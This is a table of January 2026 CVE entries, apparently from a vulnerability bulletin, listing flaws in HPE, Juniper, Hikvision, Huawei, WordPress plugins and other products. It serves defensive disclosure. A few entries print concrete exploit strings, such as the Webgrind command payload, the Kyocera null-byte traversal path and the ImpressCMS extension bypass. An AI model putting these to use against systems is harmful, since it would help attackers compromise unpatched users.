| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37170 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37171 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37172 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An improper input handling vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor with valid credentials to trigger unintended behavior on the affected system. | 2026-01-13 | 7.2 | CVE-2025-37173 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Authenticated arbitrary file write vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to create or modify arbitrary files and execute arbitrary commands as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37174 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Arbitrary file upload vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files as a privilege user and execute arbitrary commands on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37175 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation. | 2026-01-14 | 7.2 | CVE-2025-37181 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation. | 2026-01-14 | 7.2 | CVE-2025-37182 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation. | 2026-01-14 | 7.2 | CVE-2025-37183 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--Instant On | A vulnerability in the router mode configuration of HPE Instant On Access Points exposed certain network configuration details to unintended interfaces. A malicious actor could gain knowledge of internal network configuration details through inspecting impacted packets. | 2026-01-13 | 7.5 | CVE-2025-37165 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--Instant On | A vulnerability affecting HPE Networking Instant On Access Points has been identified where a device processing a specially crafted packet could enter a non-responsive state, in some cases requiring a hard reset to re-establish services. A malicious actor could leverage this vulnerability to conduct a Denial-of-Service attack on a target network. | 2026-01-13 | 7.5 | CVE-2025-37166 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--Virtual Intranet Access (VIA) | A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking Virtual Intranet Access (VIA) client. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with root privileges. | 2026-01-13 | 7.8 | CVE-2025-37186 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04994en_us&docLocale=en_US |
| Hikvision--DS-96xxxNI-Hx | There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision NVR/DVR/CVR/IPC models. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device. | 2026-01-13 | 8.8 | CVE-2025-66177 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/buffer-overflow-vulnerabilities-in-some-hikvision-products/ |
| Hikvision--DS-K1T331 | There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision Access Control Products. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device. | 2026-01-13 | 8.8 | CVE-2025-66176 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/buffer-overflow-vulnerabilities-in-some-hikvision-products/ |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.11.4, there is a flaw in Hono's JWK/JWKS JWT verification middleware allowed the JWT header's alg value to influence signature verification when the selected JWK did not explicitly specify an algorithm. This could enable JWT algorithm confusion and, in certain configurations, allow forged tokens to be accepted. As part of this fix, the JWT middleware now requires the alg option to be explicitly specified. This prevents algorithm confusion by ensuring that the verification algorithm is not derived from untrusted JWT header values. This vulnerability is fixed in 4.11.4. | 2026-01-13 | 8.2 | CVE-2026-22817 | https://github.com/honojs/hono/security/advisories/GHSA-f67f-6cw9-8mq4 https://github.com/honojs/hono/commit/cc0aa7ae327ed84cc391d29086dec2a3e44e7a1f |
| honojs--hono | Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.11.4, there is a flaw in Hono's JWK/JWKS JWT verification middleware allowed the algorithm specified in the JWT header to influence signature verification when the selected JWK did not explicitly define an algorithm. This could enable JWT algorithm confusion and, in certain configurations, allow forged tokens to be accepted. The JWK/JWKS JWT verification middleware has been updated to require an explicit allowlist of asymmetric algorithms when verifying tokens. The middleware no longer derives the verification algorithm from untrusted JWT header values. This vulnerability is fixed in 4.11.4. | 2026-01-13 | 8.2 | CVE-2026-22818 | https://github.com/honojs/hono/security/advisories/GHSA-3vhc-576x-3qv4 https://github.com/honojs/hono/commit/190f6e28e2ca85ce3d1f2f54db1310f5f3eab134 |
| Httpdebugger--HTTPDebuggerPro | HTTPDebuggerPro 9.11 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the service configuration to inject malicious executables and gain elevated access to the system. | 2026-01-15 | 7.8 | CVE-2021-47762 | ExploitDB-50545 Official Product Homepage |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8 | CVE-2025-68955 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8 | CVE-2025-68956 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8.4 | CVE-2025-68957 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8 | CVE-2025-68958 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the video framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8.4 | CVE-2025-68960 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Double free vulnerability in the multi-mode input module. Impact: Successful exploitation of this vulnerability may affect the input function. | 2026-01-14 | 7.8 | CVE-2025-68968 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| I-Funbox--iFunbox | iFunbox 4.2 contains an unquoted service path vulnerability in the Apple Mobile Device Service that allows local attackers to execute code with elevated privileges. Attackers can insert a malicious executable into the unquoted service path to run with LocalSystem privileges when the service restarts. | 2026-01-15 | 7.8 | CVE-2021-47803 | ExploitDB-50040 iFunbox Official Homepage VulnCheck Advisory: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path |
| ilwebmaster21--WOW21 | WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50921 | ExploitDB-50818 Archived Product Homepage VulnCheck Advisory: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path |
| ImpressCMS--ImpressCMS | ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions .php2.php6.php7.phps.pht to execute arbitrary PHP code on the server. | 2026-01-13 | 9.8 | CVE-2022-50912 | ExploitDB-50890 Official ImpressCMS Homepage ImpressCMS GitHub Repository VulnCheck Advisory: ImpressCMS 1.4.4 - Unrestricted File Upload |
| Inbit--Inbit Messenger | Inbit Messenger 4.6.0 - 4.9.0 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by exploiting a stack overflow in the messenger's protocol. Attackers can send specially crafted XML packets to port 10883 with a malicious payload to trigger the vulnerability and execute commands with system privileges. | 2026-01-13 | 9.8 | CVE-2023-54329 | ExploitDB-51127 Archived Software Download Page Exploit Write-Up VulnCheck Advisory: Inbit Messenger 4.9.0 - Unauthenticated Remote Command Execution (RCE) |
| Inbit--Inbit Messenger | Inbit Messenger versions 4.6.0 to 4.9.0 contain a remote stack-based buffer overflow vulnerability that allows unauthenticated attackers to execute arbitrary code by sending malformed network packets. Attackers can craft a specially designed payload targeting the messenger's network handler to overwrite the Structured Exception Handler (SEH) and execute shellcode on vulnerable Windows systems. | 2026-01-13 | 9.8 | CVE-2023-54330 | ExploitDB-51126 Archived Software Download Page Exploit Write-Up VulnCheck Advisory: Inbit Messenger 4.9.0 - Unauthenticated Remote SEH Overflow |
| Infonetsoftware--Mediconta | Mediconta 3.7.27 contains an unquoted service path vulnerability in the servermedicontservice that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\medicont3\ to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2023-54336 | ExploitDB-51064 Vendor Homepage VulnCheck Advisory: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use RTL_QUERY_REGISTRY_DIRECT flag to read a registry value to which an untrusted user-mode application may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12050 | https://www.insyde.com/security-pledge/sa-2025010/ |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use RTL_QUERY_REGISTRY_DIRECT flag to read a registry value to which an untrusted user-mode application may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12051 | https://www.insyde.com/security-pledge/sa-2025010/ |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use RTL_QUERY_REGISTRY_DIRECT flag to read a registry value to which an untrusted user-mode application may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12052 | https://www.insyde.com/security-pledge/sa-2025010/ |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use RTL_QUERY_REGISTRY_DIRECT flag to read a registry value to which an untrusted user-mode application may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12053 | https://www.insyde.com/security-pledge/sa-2025010/ |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, There is a heap-based buffer overflow in SIccCalcOp::Describe() at IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2. | 2026-01-13 | 8.8 | CVE-2026-22861 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-vr49-3vf8-7j5h https://github.com/InternationalColorConsortium/iccDEV/pull/475 https://github.com/InternationalColorConsortium/iccDEV/pull/476 https://github.com/InternationalColorConsortium/iccDEV/commit/fa9a364c01fc2e59eb2291e1f9b1c1359b7d5329 |
| ITEC--TCQ | ITeC ITeCProteccioAppServer contains an unquoted service path vulnerability that allows local attackers to execute code with elevated system privileges. Attackers can insert a malicious executable in the service path to gain elevated access during service restart or system reboot. | 2026-01-13 | 8.4 | CVE-2022-50913 | ExploitDB-50902 Vendor Homepage VulnCheck Advisory: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path |
| itsourcecode--Society Management System | A flaw has been found in itsourcecode Society Management System 1.0. The affected element is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-01-18 | 7.3 | CVE-2026-1119 | VDB-341711 | itsourcecode Society Management System delete_activity.php sql injection VDB-341711 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734290 | itsourcecode Society Management System V1.0 SQL injection https://github.com/AriazzzZ/CVE/issues/1 https://itsourcecode.com/ |
| IVT Corp--Bluetooth Application BlueSoleilCS | BlueSoleilCS 5.4.277 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path in 'C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe' to inject malicious executables and escalate privileges. | 2026-01-13 | 8.4 | CVE-2022-50928 | ExploitDB-50761 Archived IVT Corporation Website VulnCheck Advisory: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path |
| jeroenpeters1986--Name Directory | The Name Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name_directory_name' and 'name_directory_description' parameters in all versions up to, and including, 1.30.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 7.2 | CVE-2025-15283 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c9de67e-24f7-4c4a-b187-405597b838c3?source=cve https://plugins.trac.wordpress.org/browser/name-directory/tags/1.30.3/shortcode.php?marks=38,41,69#L38 https://plugins.trac.wordpress.org/browser/name-directory/tags/1.30.3/admin.php?marks=927-928#L927 |
| jokkedk--Webgrind | Webgrind 1.1 contains a remote command execution vulnerability that allows unauthenticated attackers to inject OS commands via the dataFile parameter in index.php. Attackers can execute arbitrary system commands by manipulating the dataFile parameter, such as using payload '0%27%26calc.exe%26%27' to execute commands on the target system. | 2026-01-13 | 9.8 | CVE-2023-54339 | ExploitDB-51074 Webgrind GitHub Repository VulnCheck Advisory: Webgrind 1.1 - Remote Command Execution (RCE) via dataFile Parameter |
| jotron--StudyMD | StudyMD 0.3.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47842 | ExploitDB-49832 StudyMD GitHub Repository Proof of Concept Video VulnCheck Advisory: StudyMD 0.3.2 - Persistent Cross-Site Scripting |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Juniper DHCP service (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a DHCP client in one subnet to exhaust the address pools of other subnets, leading to a Denial of Service (DoS) on the downstream DHCP server. By default, the DHCP relay agent inserts its own Option 82 information when forwarding client requests, optionally replacing any Option 82 information provided by the client. When a specific DHCP DISCOVER is received in 'forward-only' mode with Option 82, the device should drop the message unless 'trust-option82' is configured. Instead, the DHCP relay forwards these packets to the DHCP server unmodified, which uses up addresses in the DHCP server's address pool, ultimately leading to address pool exhaustion. This issue affects Junos OS: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S12, * all versions of 22.2, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R1-S1, 25.2R2. Junos OS Evolved: * all versions before 21.4R3-S12-EVO, * all versions of 22.2-EVO, * from 22.4 before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO. | 2026-01-15 | 7.4 | CVE-2025-59960 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103149 |
| Juniper Networks--Junos OS | A Buffer Over-read vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). When an affected device receives a BGP update with a set of specific optional transitive attributes over an established peering session, rpd will crash and restart when attempting to advertise the received information to another peer. This issue can only happen if one or both of the BGP peers of the receiving session are non-4-byte-AS capable as determined from the advertised capabilities during BGP session establishment. Junos OS and Junos OS Evolved default behavior is 4-byte-AS capable unless this has been specifically disabled by configuring: [ protocols bgp ... disable-4byte-as ] Established BGP sessions can be checked by executing: show bgp neighbor <IP address> | match "4 byte AS" This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S2-EVO, * 24.4 versions before 24.4R2-EVO. | 2026-01-15 | 7.5 | CVE-2025-60003 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103166 |
| Juniper Networks--Junos OS | A Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the SIP application layer gateway (ALG) of Juniper Networks Junos OS on SRX Series and MX Series with MX-SPC3 or MS-MPC allows an unauthenticated network-based attacker sending specific SIP messages over TCP to crash the flow management process, leading to a Denial of Service (DoS). On SRX Series, and MX Series with MX-SPC3 or MS-MPC service cards, receipt of multiple SIP messages causes the SIP headers to be parsed incorrectly, eventually causing a continuous loop and leading to a watchdog timer expiration, crashing the flowd process on SRX Series and MX Series with MX-SPC3, or mspmand process on MX Series with MS-MPC. This issue only occurs over TCP. SIP messages sent over UDP cannot trigger this issue. This issue affects Junos OS on SRX Series and MX Series with MX-SPC3 and MS-MPC: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S1, 25.2R2. | 2026-01-15 | 7.5 | CVE-2026-21905 | https://supportportal.juniper.net/JSA106004 https://kb.juniper.net/JSA106004 |
| Juniper Networks--Junos OS | An Improper Handling of Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated network-based attacker sending a specific ICMP packet through a GRE tunnel to cause the PFE to crash and restart. When PowerMode IPsec (PMI) and GRE performance acceleration are enabled and the device receives a specific ICMP packet, a crash occurs in the SRX PFE, resulting in traffic loss. PMI is enabled by default, and GRE performance acceleration can be enabled by running the configuration command shown below. PMI is a mode of operation that provides IPsec performance improvements using Vector Packet Processing. Note that PMI with GRE performance acceleration is only supported on specific SRX platforms. This issue affects Junos OS on the SRX Series: * all versions before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S5, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S1, 25.2R2. | 2026-01-15 | 7.5 | CVE-2026-21906 | https://supportportal.juniper.net/JSA106005 https://www.juniper.net/documentation/us/en/software/junos/vpn-ipsec/topics/topic-map/security-powermode-ipsec-vpn.html https://kb.juniper.net/JSA106005 |
| Juniper Networks--Junos OS | A Use After Free vulnerability was identified in the 802.1X authentication daemon (dot1xd) of Juniper Networks Junos OS and Junos OS Evolved that could allow an authenticated, network-adjacent attacker flapping a port to crash the dot1xd process, leading to a Denial of Service (DoS), or potentially execute arbitrary code within the context of the process running as root. The issue is specific to the processing of a change in authorization (CoA) when a port bounce occurs. A pointer is freed but was then referenced later in the same code path. Successful exploitation is outside the attacker's direct control due to the specific timing of the two events required to execute the vulnerable code path. This issue affects systems with 802.1X authentication port-based network access control (PNAC) enabled. This issue affects: Junos OS: * from 23.2R2-S1 before 23.2R2-S5, * from 23.4R2 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S2, 25.2R2; Junos OS Evolved: * from 23.2R2-S1 before 23.2R2-S5-EVO, * from 23.4R2 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S3-EVO, * from 24.4 before 24.4R2-S1-EVO, * from 25.2 before 25.2R1-S2-EVO, 25.2R2-EVO. | 2026-01-15 | 7.1 | CVE-2026-21908 | https://supportportal.juniper.net/JSA106007 https://kb.juniper.net/JSA106007 |
| Juniper Networks--Junos OS | An Incorrect Initialization of Resource vulnerability in the Internal Device Manager (IDM) of Juniper Networks Junos OS on EX4000 models allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On EX4000 models with 48 ports (EX4000-48T, EX4000-48P, EX4000-48MP) a high volume of traffic destined to the device will cause an FXPC crash and restart, which leads to a complete service outage until the device has automatically restarted. The following reboot reason can be seen in the output of 'show chassis routing-engine' and as a log message: reason=0x4000002 reason_string=0x4000002:watchdog + panic with core dump This issue affects Junos OS on EX4000-48T, EX4000-48P and EX4000-48MP: * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R1-S2, 25.2R2. This issue does not affect versions before 24.4R1 as the first Junos OS version for the EX4000 models was 24.4R1. | 2026-01-15 | 7.5 | CVE-2026-21913 | https://supportportal.juniper.net/JSA106014 https://kb.juniper.net/JSA106014 |
| Juniper Networks--Junos OS | An Improper Locking vulnerability in the GTP plugin of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (Dos). If an SRX Series device receives a specifically malformed GPRS Tunnelling Protocol (GTP) Modify Bearer Request message, a lock is acquired and never released. This results in other threads not being able to acquire a lock themselves, causing a watchdog timeout leading to FPC crash and restart. This issue leads to a complete traffic outage until the device has automatically recovered. This issue affects Junos OS on SRX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R1-S1, 25.2R2. | 2026-01-15 | 7.5 | CVE-2026-21914 | https://supportportal.juniper.net/JSA106015 https://kb.juniper.net/JSA106015 |
| Juniper Networks--Junos OS | An Improper Validation of Syntactic Correctness of Input vulnerability in the Web-Filtering module of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). If an SRX device configured for UTM Web-Filtering receives a specifically malformed SSL packet, this will cause an FPC crash and restart. This issue affects Junos OS on SRX Series: * 23.2 versions from 23.2R2-S2 before 23.2R2-S5, * 23.4 versions from 23.4R2-S1 before 23.4R2-S5, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R1-S3, 24.4R2. Earlier versions of Junos are also affected, but no fix is available. | 2026-01-15 | 7.5 | CVE-2026-21917 | https://supportportal.juniper.net/JSA105996 https://kb.juniper.net/JSA105996 |
| Juniper Networks--Junos OS | A Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX and MX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On all SRX and MX Series platforms, when during TCP session establishment a specific sequence of packets is encountered a double free happens. This causes flowd to crash and the respective FPC to restart. This issue affects Junos OS on SRX and MX Series: * all versions before 22.4R3-S7, * 23.2 versions before 23.2R2-S3, * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2. | 2026-01-15 | 7.5 | CVE-2026-21918 | https://supportportal.juniper.net/JSA106018 https://kb.juniper.net/JSA106018 |
| Juniper Networks--Junos OS | An Unchecked Return Value vulnerability in the DNS module of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). If an SRX Series device configured for DNS processing, receives a specifically formatted DNS request flowd will crash and restart, which causes a service interruption until the process has recovered. This issue affects Junos OS on SRX Series: * 23.4 versions before 23.4R2-S5, * 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R2. This issue does not affect Junos OS versions before 23.4R1. | 2026-01-15 | 7.5 | CVE-2026-21920 | https://supportportal.juniper.net/JSA106020 https://kb.juniper.net/JSA106020 |
| kalyan02--NanoCMS | NanoCMS 0.4 contains an authenticated file upload vulnerability that allows remote code execution through unvalidated page content creation. Authenticated attackers can upload PHP files with arbitrary code to the server's pages directory by exploiting the page creation mechanism without proper input sanitization. | 2026-01-13 | 8.8 | CVE-2022-50898 | ExploitDB-50997 NanoCMS GitHub Repository NanoCMS Exploit Archive VulnCheck Advisory: NanoCMS 0.4 - Remote Code Execution (RCE) (Authenticated) |
| kraftplugins--Demo Importer Plus | The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0. | 2026-01-17 | 7.5 | CVE-2025-14478 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b2971aa0-8287-4142-bd04-7aec1ed92e7b?source=cve https://plugins.trac.wordpress.org/browser/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php#L88 https://plugins.trac.wordpress.org/browser/demo-importer-plus/tags/2.0.6/inc/importers/class-demo-importer-plus-sites-helper.php#L88 https://plugins.trac.wordpress.org/changeset/3439643/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php |
| KYOCERA Document Solutions--Kyocera Command Center RX | Kyocera Command Center RX ECOSYS M2035dn contains a directory traversal vulnerability that allows unauthenticated attackers to read sensitive system files by manipulating file paths under the /js/ path. Attackers can exploit the issue by sending requests like /js/../../../../.../etc/passwd%00.jpg (null-byte appended traversal) to access critical files such as /etc/passwd and /etc/shadow. | 2026-01-13 | 7.5 | CVE-2022-50932 | ExploitDB-50738 Kyocera Command Center RX Official Product Page VulnCheck Advisory: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) |
| LabRedesCefetRJ--WeGIA | WeGIA is a Web Manager for Charitable Institutions. Prior to 3.6.2, a Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the html/memorando/insere_despacho.php file. The application fails to properly sanitize or encode user-supplied input via the id_memorando GET parameter before reflecting it into the HTML source (likely inside a <script> block or an attribute). This allows unauthenticated attackers to inject arbitrary JavaScript or HTML into the context of the user's browser session. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 9.1 | CVE-2026-23722 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an authenticated SQL Injection vulnerability was identified in the Atendido_ocorrenciaControle endpoint via the id_memorando parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 7.2 | CVE-2026-23723 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
